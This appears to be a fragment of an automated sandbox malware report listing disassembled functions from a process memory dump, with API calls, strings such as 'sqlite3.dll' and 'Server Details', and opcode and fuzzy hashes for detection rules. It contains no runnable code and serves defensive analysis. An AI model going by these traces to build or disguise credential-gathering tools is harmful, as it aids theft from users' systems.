                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID: C@
                                                                                                                                                                                          • API String ID: 1449862175-3201871010
                                                                                                                                                                                          • Opcode ID: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                          • Instruction ID: 7447114fd14c0d02a0ee842544e77a6286768af896f3cc7789f687588c6d710a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88018871C04118AFDB00AF65DC45A8F7FB8DF05364F11C166F855B7191DB349A05CBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409669 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00409682
                                                                                                                                                                                          • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                          • String ID: 5\@
                                                                                                                                                                                          • API String ID: 568519121-3174280609
                                                                                                                                                                                          • Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                          • Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                          • Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407211 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                          • String ID: L$ini
                                                                                                                                                                                          • API String ID: 714388716-4234614086
                                                                                                                                                                                          • Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                          • Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041104F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _msizerealloc
                                                                                                                                                                                          • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                          • API String ID: 2713192863-2134078882
                                                                                                                                                                                          • Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                          • Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
                                                                                                                                                                                          • Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408DE1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                                                            • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                                                            • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                                                            • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                          • String ID: menu_%d
                                                                                                                                                                                          • API String ID: 1129539653-2417748251
                                                                                                                                                                                          • Opcode ID: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                          • Instruction ID: fc9d5e34a24bd2be33db7f468ba420a1802cee0dbde2c18454a4e056650a0418
                                                                                                                                                                                          • Opcode Fuzzy Hash: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96D0C23064174022FB3023266D0EF4B29595BC3B47F1400AEF400B10D2CBBC400486BE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                                                                                                                                                                          • strrchr.MSVCRT ref: 00409579
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040958E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                          • API String ID: 3334749609-1948609170
                                                                                                                                                                                          • Opcode ID: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                          • Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
                                                                                                                                                                                          • Opcode Fuzzy Hash: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406E81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                          • String ID: sqlite3.dll
                                                                                                                                                                                          • API String ID: 1983510840-1155512374
                                                                                                                                                                                          • Opcode ID: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                          • Instruction ID: b4f080e30331be102d7f345a143f57ec91a882a22c28ed8e87256c61ce2af050
                                                                                                                                                                                          • Opcode Fuzzy Hash: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3C0803240513125BB0177717C028AF7D48DF82394B01046EF58561111DD694D3255EB
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004033A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileString
                                                                                                                                                                                          • String ID: 34@$Server Details
                                                                                                                                                                                          • API String ID: 1096422788-1041202369
                                                                                                                                                                                          • Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                          • Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                          • Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042BE74 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                          • Opcode ID: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                          • Instruction ID: 1cbfd9147006f86015284e0c7f96a5a033359537089e49602f9f07bbf2bf02d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B761DE72604702AFDB20DF65E981A6BB7E4FF44304F44492EFA5982250D738ED54CBDA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004081FD Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3110682361-0
                                                                                                                                                                                          • Opcode ID: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                          • Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
                                                                                                                                                                                          • Opcode Fuzzy Hash: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00415B07 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3510742995-0
                                                                                                                                                                                          • Opcode ID: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                          • Instruction ID: c59a560e0875e34eddc7238b356bca14a42e0d2f6379eea325777a24e0ec34d0
                                                                                                                                                                                          • Opcode Fuzzy Hash: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E11E6B7D00618ABDB01DFA4DC899DEB7ACEB49310F414836FA05CB140E634E2488799
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004096FB Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                          • Opcode ID: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                          • Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%